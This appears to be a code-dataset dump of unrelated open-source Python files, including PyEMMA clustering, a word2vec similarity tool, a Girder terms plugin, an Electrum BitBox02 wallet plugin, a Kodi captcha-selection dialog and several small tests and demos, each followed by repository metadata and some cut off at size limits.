'''
import warnings
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import fix_docs
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
@fix_docs
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
__serialize_version = 0
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None, skip=0):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
        Voronoi partitioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self._converged = False
self.set_params(dmin=dmin, metric=metric,
max_centers=max_centers, stride=stride, skip=skip)
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
d = float(d)
if d < 0:
raise ValueError("d has to be positive")
self._dmin = d
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
value = int(value)
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = value
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
used_frames = 0
from ._ext import regspace
self._inst = regspace.Regspace_f(self.dmin, self.max_centers, self.metric, iterable.ndim)
it = iterable.iterator(return_trajindex=False, stride=self.stride,
chunk=self.chunksize, skip=self.skip)
try:
with it:
for X in it:
used_frames += len(X)
                    self._inst.cluster(X.astype(np.float32, order='C', copy=False),
clustercenters, self.n_jobs)
self._converged = True
        except regspace.MaxCentersReachedException:
self._converged = False
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self.logger.warning(msg)
warnings.warn(msg)
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
finally:
# even if not converged, we store the found centers.
new_shape = (len(clustercenters), iterable.ndim)
clustercenters = np.array(clustercenters).reshape(new_shape)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self.logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
|
matzika/article-tagger-system
|
words_similarity_detector.py
|
Python
|
gpl-2.0
| 3,189
| 0.007839
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 11:57:45 2016
@author: katerinailiakopoulou
"""
import gensim
import logging
import sys
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
"""
The Finder finds which words are similar to the one given
based on the word2vec word vectors. It also prints how similar two
words are depending on their word vectors comparison.
"""
class Finder(object):
def __init__(self,model,output,topn):
self.output_file = open(output,'w')
self.m = gensim.models.Word2Vec.load(model)
print(len(self.m.index2word))
self.n = topn
def get_most_similar(self,input):
self.output_file.write('---Similar words to:' + input + '---\n')
try:
self.output_file.write(str(self.m.most_similar([input], topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_negs_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
pos_negs = input.split('NOT')
pos = pos_negs[0]
neg = pos_negs[1]
poss = pos.split('AND')
negs = neg.split(',')
positives = []
for p in poss:
positives.append(p.strip())
negatives = []
for n in negs:
negatives.append(n.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, negative=negatives, topn=self.n)))
except KeyError as e:
            self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
poss = input.split('AND')
positives = []
for p in poss:
positives.append(p.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
        self.output_file.write('\n')
def get_similarity(self,input):
self.output_file.write('--- Similarity between: ' + input + '---\n')
parts = input.split('-')
try:
self.output_file.write(str(self.m.similarity(parts[0], parts[1])))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def process_input(self,input):
f = open(input, 'r+')
for line in f:
word = line.replace("\n", "")
            if 'AND' in line and 'NOT' in line:
self.get_pos_negs_similar(word)
elif 'AND' in line:
self.get_pos_similar(word)
elif '-' in line:
self.get_similarity(word)
else:
self.get_most_similar(word)
if __name__ == "__main__":
if len(sys.argv) < 5:
sys.exit('Please provide [word2vec model] [input directory], [output directory] [similar word count]: [--s --s --s --int]')
Finder(sys.argv[1],sys.argv[3],int(sys.argv[4])).process_input(sys.argv[2])
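# --- Illustrative usage (not part of the script above) ----------------------
# One query per line in the input file; the syntax process_input understands:
#   "king AND woman NOT man"  -> positive/negative analogy query
#   "fast AND quick"          -> combined positive query
#   "cat-dog"                 -> similarity between two words
#   "python"                  -> plain nearest-neighbour lookup
# The model, file names and top-n count below are assumptions for the example.
def _example_run():
    with open('queries.txt', 'w') as f:
        f.write('king AND woman NOT man\ncat-dog\npython\n')
    Finder('model.w2v', 'results.txt', 10).process_input('queries.txt')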
|
adsorensen/girder
|
plugins/terms/server/__init__.py
|
Python
|
apache-2.0
| 3,937
| 0.003048
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
import hashlib
from girder import events
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import boundHandler, RestException
from girder.api.v1.collection import Collection
from girder.constants import AccessType, TokenScope
from girder.models.model_base import ModelImporter
@access.user(scope=TokenScope.DATA_READ)
@boundHandler
@autoDescribeRoute(
Description('Accept a collection\'s Terms of Use for the current user.')
.modelParam('id', model='collection', level=AccessType.READ)
.param('termsHash', 'The SHA-256 hash of this collection\'s terms, encoded in hexadecimal.')
)
def acceptCollectionTerms(self, collection, termsHash):
if not collection.get('terms'):
raise RestException('This collection currently has no terms.')
# termsHash should be encoded to a bytes object, but storing bytes into MongoDB behaves
# differently in Python 2 vs 3. Additionally, serializing a bytes to JSON behaves differently
# in Python 2 vs 3. So, just keep it as a unicode (or ordinary Python 2 str).
realTermsHash = hashlib.sha256(collection['terms'].encode('utf-8')).hexdigest()
if termsHash != realTermsHash:
# This "proves" that the client has at least accessed the terms
raise RestException(
'The submitted "termsHash" does not correspond to the collection\'s current terms.')
ModelImporter.model('user').update(
{'_id': self.getCurrentUser()['_id']},
{'$set': {
'terms.collection.%s' % collection['_id']: {
'hash': termsHash,
'accepted': datetime.datetime.now()
}
}}
)
def afterPostPutCollection(event):
# This will only trigger if no exceptions (for access, invalid id, etc.) are thrown
extraParams = event.info['params']
if 'terms' in extraParams:
collectionResponse = event.info['returnVal']
collectionId = collectionResponse['_id']
terms = extraParams['terms']
ModelImporter.model('collection').update(
{'_id': collectionId},
{'$set': {'terms': terms}}
)
collectionResponse['terms'] = terms
event.addResponse(collectionResponse)
def load(info):
# Augment the collection creation and edit routes to accept a terms field
events.bind('rest.post.collection.after', 'terms', afterPostPutCollection)
events.bind('rest.put.collection/:id.after', 'terms', afterPostPutCollection)
for handler in [
Collection.createCollection,
Collection.updateCollection
]:
handler.description.param('terms', 'The Terms of Use for the collection.', required=False)
# Expose the terms field on all collections
ModelImporter.model('collection').exposeFields(level=AccessType.READ, fields={'terms'})
# Add endpoint for registered users to accept terms
info['apiRoot'].collection.route('POST', (':id', 'acceptTerms'), acceptCollectionTerms)
# Expose the terms field on all users
ModelImporter.model('user').exposeFields(level=AccessType.ADMIN, fields={'terms'})
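# --- Illustrative sketch (not part of the plugin above) ---------------------
# A client accepting a collection's terms must send the SHA-256 hex digest of
# the exact terms text it displayed; acceptCollectionTerms compares it against
# the collection's current terms. A minimal helper for computing that digest:
def example_terms_hash(terms_text):
    """Return the hex digest expected in the 'termsHash' parameter."""
    return hashlib.sha256(terms_text.encode('utf-8')).hexdigest()

# The accepting request then goes to the route registered in load() above:
# POST /collection/<id>/acceptTerms with termsHash=example_terms_hash(terms).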
|
ardi69/pyload-0.4.10
|
pyload/plugin/crypter/Dereferer.py
|
Python
|
gpl-3.0
| 584
| 0.017123
|
# -*- coding: utf-8 -*-
from pyload.plugin.internal.SimpleDereferer import SimpleDereferer
class Dereferer(SimpleDereferer):
__name = "Dereferer"
__type = "crypter"
__version = "0.11"
__pattern = r'https?://([^/]+)/.*?(?P<LINK>(ht|f)tps?(://|%3A%2F%2F).+)'
__config = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
    __description = """Crypter for dereferers"""
__license = "GPLv3"
__authors = [("zoidberg", "[email protected]")]
|
chromium/chromium
|
testing/merge_scripts/code_coverage/merge_lib_test.py
|
Python
|
bsd-3-clause
| 1,506
| 0.007968
|
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import unittest
import mock
import merge_lib as merger
class MergeLibTest(unittest.TestCase):
# pylint: disable=super-with-arguments
def __init__(self, *args, **kwargs):
super(MergeLibTest, self).__init__(*args, **kwargs)
self.maxDiff = None
# pylint: enable=super-with-arguments
@mock.patch.object(subprocess, 'check_output')
def test_validate_and_convert_profraw(self, mock_cmd):
test_cases = [
([''], [['mock.profdata'], [], []]),
(['Counter overflow'], [[], ['mock.profraw'], ['mock.profraw']]),
(subprocess.CalledProcessError(
255,
'llvm-cov merge -o mock.profdata -sparse=true mock.profraw',
output='Malformed profile'), [[], ['mock.profraw'], []]),
]
for side_effect, expected_results in test_cases:
mock_cmd.side_effect = side_effect
output_profdata_files = []
invalid_profraw_files = []
counter_overflows = []
merger._validate_and_convert_profraw(
'mock.profraw', output_profdata_files, invalid_profraw_files,
counter_overflows, '/usr/bin/llvm-cov')
self.assertEqual(
expected_results,
[output_profdata_files, invalid_profraw_files, counter_overflows])
if __name__ == '__main__':
unittest.main()
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/bitbox02/bitbox02.py
|
Python
|
gpl-3.0
| 27,314
| 0.002123
|
#
# BitBox02 Electrum plugin code.
#
import hid
from typing import TYPE_CHECKING, Dict, Tuple, Optional, List, Any, Callable
from electrum_grs import bip32, constants
from electrum_grs.i18n import _
from electrum_grs.keystore import Hardware_KeyStore
from electrum_grs.transaction import PartialTransaction
from electrum_grs.wallet import Standard_Wallet, Multisig_Wallet, Deterministic_Wallet
from electrum_grs.util import bh2u, UserFacingException
from electrum_grs.base_wizard import ScriptTypeNotSupported, BaseWizard
from electrum_grs.logging import get_logger
from electrum_grs.plugin import Device, DeviceInfo, runs_in_hwd_thread
from electrum_grs.simple_config import SimpleConfig
from electrum_grs.json_db import StoredDict
from electrum_grs.storage import get_derivation_used_for_hw_device_encryption
from electrum_grs.bitcoin import OnchainOutputType
import electrum_grs.bitcoin as bitcoin
import electrum_grs.ecc as ecc
from ..hw_wallet import HW_PluginBase, HardwareClientBase
_logger = get_logger(__name__)
try:
from bitbox02 import bitbox02
from bitbox02 import util
from bitbox02.communication import (
devices,
HARDENED,
u2fhid,
bitbox_api_protocol,
FirmwareVersionOutdatedException,
)
requirements_ok = True
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'bitbox02'):
_logger.exception('error importing bitbox02 plugin deps')
requirements_ok = False
class BitBox02Client(HardwareClientBase):
# handler is a BitBox02_Handler, importing it would lead to a circular dependency
def __init__(self, handler: Any, device: Device, config: SimpleConfig, *, plugin: HW_PluginBase):
HardwareClientBase.__init__(self, plugin=plugin)
self.bitbox02_device = None # type: Optional[bitbox02.BitBox02]
self.handler = handler
self.device_descriptor = device
self.config = config
self.bitbox_hid_info = None
if self.config.get("bitbox02") is None:
bitbox02_config: dict = {
"remote_static_noise_keys": [],
"noise_privkey": None,
}
self.config.set_key("bitbox02", bitbox02_config)
bitboxes = devices.get_any_bitbox02s()
for bitbox in bitboxes:
if (
bitbox["path"] == self.device_descriptor.path
and bitbox["interface_number"]
== self.device_descriptor.interface_number
):
self.bitbox_hid_info = bitbox
if self.bitbox_hid_info is None:
raise Exception("No BitBox02 detected")
def is_initialized(self) -> bool:
return True
@runs_in_hwd_thread
def close(self):
try:
self.bitbox02_device.close()
except:
pass
def has_usable_connection_with_device(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def get_soft_device_id(self) -> Optional[str]:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return None
if self.bitbox02_device is None:
self.pairing_dialog()
return self.bitbox02_device.root_fingerprint().hex()
@runs_in_hwd_thread
def pairing_dialog(self):
def pairing_step(code: str, device_response: Callable[[], bool]) -> bool:
msg = "Please compare and confirm the pairing code on your BitBox02:\n" + code
self.handler.show_message(msg)
try:
res = device_response()
except:
# Close the hid device on exception
hid_device.close()
raise
finally:
self.handler.finished()
return res
def exists_remote_static_pubkey(pubkey: bytes) -> bool:
bitbox02_config = self.config.get("bitbox02")
noise_keys = bitbox02_config.get("remote_static_noise_keys")
if noise_keys is not None:
if pubkey.hex() in [noise_key for noise_key in noise_keys]:
return True
return False
def set_remote_static_pubkey(pubkey: bytes) -> None:
if not exists_remote_static_pubkey(pubkey):
bitbox02_config = self.config.get("bitbox02")
if bitbox02_config.get("remote_static_noise_keys") is not None:
bitbox02_config["remote_static_noise_keys"].append(pubkey.hex())
else:
bitbox02_config["remote_static_noise_keys"] = [pubkey.hex()]
self.config.set_key("bitbox02", bitbox02_config)
def get_noise_privkey() -> Optional[bytes]:
bitbox02_config = self.config.get("bitbox02")
privkey = bitbox02_config.get("noise_privkey")
if privkey is not None:
return bytes.fromhex(privkey)
return None
def set_noise_privkey(privkey: bytes) -> None:
bitbox02_config = self.config.get("bitbox02")
bitbox02_config["noise_privkey"] = privkey.hex()
self.config.set_key("bitbox02", bitbox02_config)
def attestation_warning() -> None:
self.handler.show_error(
"The BitBox02 attestation failed.\nTry reconnecting the BitBox02.\nWarning: The device might not be genuine, if the\n problem persists please contact Shift support.",
blocking=True
)
class NoiseConfig(bitbox_api_protocol.BitBoxNoiseConfig):
"""NoiseConfig extends BitBoxNoiseConfig"""
def show_pairing(self, code: str, device_response: Callable[[], bool]) -> bool:
return pairing_step(code, device_response)
def attestation_check(self, result: bool) -> None:
if not result:
attestation_warning()
def contains_device_static_pubkey(self, pubkey: bytes) -> bool:
return exists_remote_static_pubkey(pubkey)
def add_device_static_pubkey(self, pubkey: bytes) -> None:
return set_remote_static_pubkey(pubkey)
def get_app_static_privkey(self) -> Optional[bytes]:
return get_noise_privkey()
def set_app_static_privkey(self, privkey: bytes) -> None:
return set_noise_privkey(privkey)
if self.bitbox02_device is None:
hid_device = hid.device()
hid_device.open_path(self.bitbox_hid_info["path"])
bitbox02_device = bitbox02.BitBox02(
transport=u2fhid.U2FHid(hid_device),
device_info=self.bitbox_hid_info,
noise_config=NoiseConfig(),
)
try:
bitbox02_device.check_min_version()
except FirmwareVersionOutdatedException:
raise
self.bitbox02_device = bitbox02_device
self.fail_if_not_initialized()
def fail_if_not_initialized(self) -> None:
assert self.bitbox02_device
if not self.bitbox02_device.device_info()["initialized"]:
raise Exception(
"Please initialize the BitBox02 using the BitBox app first before using the BitBox02 in electrum"
)
def coin_network_from_electrum_network(self) -> int:
if constants.net.TESTNET:
return bitbox02.btc.TBTC
return bitbox02.btc.BTC
@runs_in_hwd_thread
def get_password_for_storage_encryption(self) -> str:
derivation = get_derivation_used_for_hw_device_encryption()
        derivation_list = bip32.convert_bip32_path_to_list_of_uint32(derivation)
xpub = self.bitbox02_device.electrum_encryption_key(derivation_list)
        node = bip32.BIP32Node.from_xkey(xpub, net = constants.BitcoinMainnet()).subkey_at_public_derivation(())
return node.eckey.get_public_key_bytes(compressed=True).hex()
@runs_in_hwd_thread
def get_xpub(self, bip32_path: str, xtype: str, *, display: boo
|
etherkit/OpenBeacon2
|
macos/venv/lib/python3.8/site-packages/PyInstaller/hooks/hook-gi.repository.Champlain.py
|
Python
|
gpl-3.0
| 702
| 0.002849
|
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
"""
Import hook for PyGObject's "gi.repository.Champlain" package.
"""
from PyInstaller.utils.hooks import get_gi_typelibs
binaries, datas, hiddenimports = get_gi_typelibs('Champlain', '0.12')
|
kevinhikali/ml_kevin
|
tf/tf_cast.py
|
Python
|
gpl-3.0
| 250
| 0
|
# -*- coding: utf-8 -*-
"""
@author: kevinhikali
@email: [email protected]
"""
import tensorflow as tf
A = [[1, 2, 3, 4]]
B = [[2, 2, 3, 4]]
casted = tf.cast(tf.equal(A, B), dtype='float32')
with tf.Session() as sess:
print(sess.run(casted))
|
bbcf/bsPlugins
|
tests/test_Annotate.py
|
Python
|
gpl-3.0
| 717
| 0.011158
|
from unittest2 import TestCase, skip
from bsPlugins.Annotate import AnnotatePlugin
import os
path = 'testing_files/'
class Test_AnnotatePlugin(TestCase):
def setUp(self):
self.plugin = AnnotatePlugin()
def test_with_signals(self):
        self.plugin(**{'track':path+'KO50.bedGraph', 'assembly':'mm9',
'promoter':0, 'intergenic':0, 'UTR':0})
with open(self.plugin.output_files[0][0],'rb') as f:
content = f.readlines()
self.assertEqual(len(content),50)
def tearDown(self):
for f in os.listdir('.'):
if f.startswith('tmp'):
os.system("rm -rf %s" % f)
# nosetests --logging-filter=-tw2 test_Annotate.py
|
mrquim/mrquimrepo
|
repo/plugin.video.live.magellan/unCaptcha.py
|
Python
|
gpl-2.0
| 14,966
| 0.029467
|
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse, urllib,urllib2,cookielib
from base64 import b64encode
import xbmc
import xbmcgui,xbmcaddon,os
__scriptID__ = 'plugin.video.live.magellan'
__addon__ = xbmcaddon.Addon(__scriptID__)
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "background.png"
check_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_checked.png"
uncheck_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_unchecked1.png"
self.ctrlBackgound = xbmcgui.ControlImage(
0,0,
1280, 720,
bg_image
)
self.cancelled=False
self.addControl (self.ctrlBackgound)
self.msg = kwargs.get('msg')+'\nNormally there are 3-4 selections and 2 rounds of pictures'
self.round=kwargs.get('round')
self.strActionInfo = xbmcgui.ControlLabel(335, 120, 700, 300, self.msg, 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.strActionInfo = xbmcgui.ControlLabel(335, 20, 724, 400, 'Captcha round %s'%(str(self.round)), 'font40', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.cptloc = kwargs.get('captcha')
#self.img = xbmcgui.ControlImage(335,200,624,400,self.cptloc)
imgw=400
imgh=300
imgX=335
imgY=200
pw=imgw/3
ph=imgh/3
self.img = xbmcgui.ControlImage(imgX,imgY,imgw,imgh,self.cptloc)
self.addControl(self.img)
self.chk=[0]*9
self.chkbutton=[0]*9
self.chkstate=[False]*9
#self.chk[0] = xbmcgui.ControlCheckMark(335,200,200,200,'select',checkWidth=30, checkHeight=30)
self.chk[0]= xbmcgui.ControlImage(imgX,imgY, pw, ph,check_image)# '', font='font1',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[1]= xbmcgui.ControlImage(imgX+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[2]= xbmcgui.ControlImage(imgX+pw+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[3]= xbmcgui.ControlImage(imgX,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[4]= xbmcgui.ControlImage(imgX+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[5]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[6]= xbmcgui.ControlImage(imgX,imgY+ph+ph, pw, ph,check_image)#, '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[7]= xbmcgui.ControlImage(imgX+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[8]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chkbutton[0]= xbmcgui.ControlButton(imgX,imgY, pw, ph, '1', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[1]= xbmcgui.ControlButton(imgX+pw,imgY, pw, ph, '2', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
        self.chkbutton[2]= xbmcgui.ControlButton(imgX+pw+pw,imgY, pw, ph, '3', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
        self.chkbutton[3]= xbmcgui.ControlButton(imgX,imgY+ph, pw, ph, '4', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[4]= xbmcgui.ControlButton(imgX+pw,imgY+ph, pw, ph, '5', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[5]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph, pw, ph, '6', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[6]= xbmcgui.ControlButton(imgX,imgY+ph+ph, pw, ph, '7', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[7]= xbmcgui.ControlButton(imgX+pw,imgY+ph+ph, pw, ph, '8', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[8]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph+ph, pw, ph, '9', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
for obj in self.chk:
self.addControl(obj )
obj.setVisible(False)
for obj in self.chkbutton:
self.addControl(obj )
#self.chk[0].setSelected(False)
self.cancelbutton = xbmcgui.ControlButton(imgX+(imgw/2)-110,imgY+imgh+10,100,40,'Cancel',alignment=2)
self.okbutton = xbmcgui.ControlButton(imgX+(imgw/2)+10,imgY+imgh+10,100,40,'OK',alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
self.chkbutton[6].controlDown(self.cancelbutton); self.chkbutton[6].controlUp(self.chkbutton[3])
self.chkbutton[7].controlDown(self.cancelbutton); self.chkbutton[7].controlUp(self.chkbutton[4])
self.chkbutton[8].controlDown(self.okbutton); self.chkbutton[8].controlUp(self.chkbutton[5])
self.chkbutton[6].controlLeft(self.chkbutton[8]);self.chkbutton[6].controlRight(self.chkbutton[7]);
self.chkbutton[7].controlLeft(self.chkbutton[6]);self.chkbutton[7].controlRight(self.chkbutton[8]);
self.chkbutton[8].controlLeft(self.chkbutton[7]);self.chkbutton[8].controlRight(self.chkbutton[6]);
self.chkbutton[3].controlDown(self.chkbutton[6]); self.chkbutton[3].controlUp(self.chkbutton[0])
self.chkbutton[4].controlDown(self.chkbutton[7]); self.chkbutton[4].controlUp(self.chkbutton[1])
self.chkbutton[5].controlDown(self.chkbutton[8]); self.chkbutton[5].controlUp(self.chkbutton[2])
self.chkbutton[3].controlLeft(self.chkbutton[5]);self.chkbutton[3].controlRight(self.chkbutton[4]);
self.chkbutton[4].controlLeft(self.chkbutton[3]);self.chkbutton[4].controlRight(self.chkbutton[5]);
self.chkbutton[5].controlLeft(self.chkbutton[4]);self.chkbutton[5].controlRight(self.chkbutton[3]);
self.chkbutton[0].controlDown(self.chkbutton[3]); self.chkbutton[0].controlUp(self.cancelbutton)
self.chkbutton[1].controlDown(self.chkbutton[4]); self.chkbutton[1].controlUp(self.cancelbutton)
self.chkbutton[2].controlDown(self.chkbutton[5]); self.chkbutton[2].controlUp(self.okbutton)
self.chkbutton[0].controlLeft(self.chkbutton[2]);self.chkbutton[0].controlRight(self.chkbutton[1]);
self.chkbutton[1].controlLeft(self.chkbutton[0]);self.chkbutton[1].controlRight(self.chkbutton[2]);
self.chkbutton[2].controlLeft(self.chkbutton[1]);self.chkbutton[2].controlRight(self.chkbutton[0]);
self.cancelled=False
self.setFocus(self.okbutton)
self.okbutton.controlLeft(self.cancelbutton);self.okbutton.controlRight(self.cancelbutton);
self.cancelbutton.controlLeft(self.okbutton); self.cancelbutton.controlRight(self.okbutton);
self.okbutton.controlDown(self.chkbutton[2]);self.okbutton.controlUp(self.chkbutton[8]);
|
scikit-image/skimage-demos
|
mm_color_cluster.py
|
Python
|
bsd-3-clause
| 2,030
| 0.000985
|
# Auto-clustering, suggested by Matt Terry
from skimage import io, color, exposure
from sklearn import cluster, preprocessing
import numpy as np
import matplotlib.pyplot as plt
url = 'http://blogs.mathworks.com/images/steve/2010/mms.jpg'
import os
if not os.path.exists('mm.jpg'):
print("Downloading M&M's...")
from urllib.request import urlretrieve
urlretrieve(url, 'mm.jpg')
print("Image I/O...")
mm = io.imread('mm.jpg')
mm_lab = color.rgb2lab(mm)
ab = mm_lab[..., 1:]
print("Mini-batch K-means...")
X = ab.reshape(-1, 2)
kmeans = cluster.MiniBatchKMeans(n_clusters=6)
y = kmeans.fit(X).labels_
labels = y.reshape(mm.shape[:2])
N = labels.max()
def no_ticks(ax):
ax.set_xticks([])
ax.set_yticks([])
# Display all clusters
for i in range(N):
mask = (labels == i)
mm_cluster = mm_lab.copy()
mm_cluster[..., 1:][~mask] = 0
ax = plt.subplot2grid((2, N), (1, i))
ax.imshow(color.lab2rgb(mm_cluster))
no_ticks(ax)
ax = plt.subplot2grid((2, N), (0, 0), colspan=2)
ax.imshow(mm)
no_ticks(ax)
# Display histogram
L, a, b = mm_lab.T
left, right = -100, 100
bins = np.arange(left, right)
H, x_edges, y_edges = np.histogram2d(a.flatten(), b.flatten(), bins,
normed=True)
ax = plt.subplot2grid((2, N), (0, 2))
H_bright = exposure.rescale_intensity(H, in_range=(0, 5e-4))
ax.imshow(H_bright,
extent=[left, right, right, left], cmap=plt.cm.gray)
ax.set_title('Histogram')
ax.set_xlabel('b')
ax.set_ylabel('a')
# Voronoi diagram
mid_bins = bins[:-1] + 0.5
L = len(mid_bins)
yy, xx = np.meshgrid(mid_bins, mid_bins)
Z = kmeans.predict(np.column_stack([xx.ravel(), yy.ravel()]))
Z = Z.reshape((L, L))
ax = plt.subplot2grid((2, N), (0, 3))
ax.imshow(Z, interpolation='nearest',
extent=[left, right, right, left],
cmap=plt.cm.Spectral, alpha=0.8)
ax.imshow(H_bright, alpha=0.2,
extent=[left, right, right, left],
cmap=plt.cm.gray)
ax.set_title('Clustered histogram')
no_ticks(ax)
plt.show()
|
allenai/allennlp
|
allennlp/modules/seq2vec_encoders/seq2vec_encoder.py
|
Python
|
apache-2.0
| 1,215
| 0.005761
|
from allennlp.modules.encoder_base import _EncoderBase
from allennlp.common import Registrable
class Seq2VecEncoder(_EncoderBase, Registrable):
"""
A `Seq2VecEncoder` is a `Module` that takes as input a sequence of vectors and returns a
single vector. Input shape : `(batch_size, sequence_length, input_dim)`; output shape:
`(batch_size, output_dim)`.
